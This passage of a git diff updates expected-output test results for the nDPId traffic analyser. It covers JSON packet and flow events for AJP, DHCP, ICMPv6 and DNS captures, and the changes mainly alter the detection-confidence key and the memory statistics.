@@ -34,8 +34,8 @@ 01488{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\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\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618} 00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":26,"total-skipped-flows":0,"total-l4-payload-len":2594,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":39,"global_ts_msec":1505154584618} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/26 @@ -45,9 +45,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871257 bytes -~~ total memory freed........: 5871257 bytes -~~ total allocations/frees...: 118144/118144 +~~ total memory allocated....: 6004891 bytes +~~ total memory freed........: 6004891 bytes +~~ total allocations/frees...: 120906/120906 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 202 chars ~~ json string max len.......: 1493 chars 
diff --git a/test/results/alexa-app.pcapng.out b/test/results/alexa-app.pcapng.out index 494c5023a..7cb783f22 100644 --- a/test/results/alexa-app.pcapng.out +++ b/test/results/alexa-app.pcapng.out 
@@ -6,148 +6,148 @@ 00294{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":20,"pkt_type":6,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":20,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCAAYAAa+BAQA="} 00546{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490976022731,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"thread_ts_msec":1490976022731,"pkt":"MzP\/0\/vCePiC0\/vCht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/0\/vChwCHAgAAAAD+gAAAAAAAAHr4gv\/+0\/vC"} -00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976022731,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490976022731,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"thread_ts_msec":1490976022731,"pkt":"MzP\/0\/vCePiC0\/vCht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/0\/vChwCHAgAAAAD+gAAAAAAAAHr4gv\/+0\/vC"} 00537{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976022741,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1490976022741,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1490976022741,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHL0AAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"} -00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976022741,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976022741,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1490976022741,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1490976022741,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHL0AAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":200000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976023264,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490976023264,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1490976023264,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCCABFAAFX84EAAEARhhUAAAAA\/\/\/\/\/wBEAEMBQ5j9AQEGAHxtfzEAAAAAAAAAAAAAAAAAAAAAAAAAAHj4gtP7wgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDPQcBePiC0\/vCMgSsECrYOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLTFjMTMzNWVjOTVhMjczMTg3CgEhAwYPGhwzOjv\/"} 
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":200000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976023264,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"android-1c1335ec95a27318","fingerprint":"1,33,3,6,15,26,28,51,58,59","class_ident":"dhcpcd-5.5.6"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":200000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976023264,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"android-1c1335ec95a27318","fingerprint":"1,33,3,6,15,26,28,51,58,59","class_ident":"dhcpcd-5.5.6"}} 
00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490976023264,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1490976023264,"pkt":"\/\/\/\/\/\/\/\/ePiC0\/vCCABFAAFX84EAAEARhhUAAAAA\/\/\/\/\/wBEAEMBQ5j9AQEGAHxtfzEAAAAAAAAAAAAAAAAAAAAAAAAAAHj4gtP7wgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDPQcBePiC0\/vCMgSsECrYOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLTFjMTMzNWVjOTVhMjczMTg3CgEhAwYPGhwzOjv\/"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976023267,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1490976023267,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1490976023267,"pkt":"ePiC0\/vCAMDKkaPvCABFAAFIz1MAAEAR\/VesECoBrBAq2ABDAEQBNCIdAgEGAHxtfzEAAAAAAAAAAKwQKtisECoBAAAAAHj4gtP7wgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgSsECoBMwQAAKjAOgQAAFRgOwQAAJOoAQT\/\/\/8AHASsECr\/AwSsECoBBgSsECoBDwNsYW7\/AAAA"} -00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976023267,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 
+00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976023267,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023731,"flow_last_seen":1490976023731,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976023731,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1490976023731,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1490976023731,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="} 
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023731,"flow_last_seen":1490976023731,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976023731,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976023731,"flow_last_seen":1490976023731,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976023731,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1490976023731,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1490976023731,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024793,"flow_last_seen":1490976024793,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024793,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1490976024793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1490976024793,"pkt":"AMDKkaPvePiC0\/vCCABFAABLWklAAEARM1+sECrYrBAqAQ1wADUAN5pbXVABAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAAcAAE="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024793,"flow_last_seen":1490976024793,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024793,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024793,"flow_last_seen":1490976024793,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024793,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1490976024844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1490976024844,"pkt":"ePiC0\/vCAMDKkaPvCABFAABnz+xAAEARvZ+sECoBrBAq2AA1DXAAU9tZXVCBgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAAcAAHADAAcAAEAAAErABAmB\/iwQAAIEwAAAAAAACAO"} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976024844,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": 
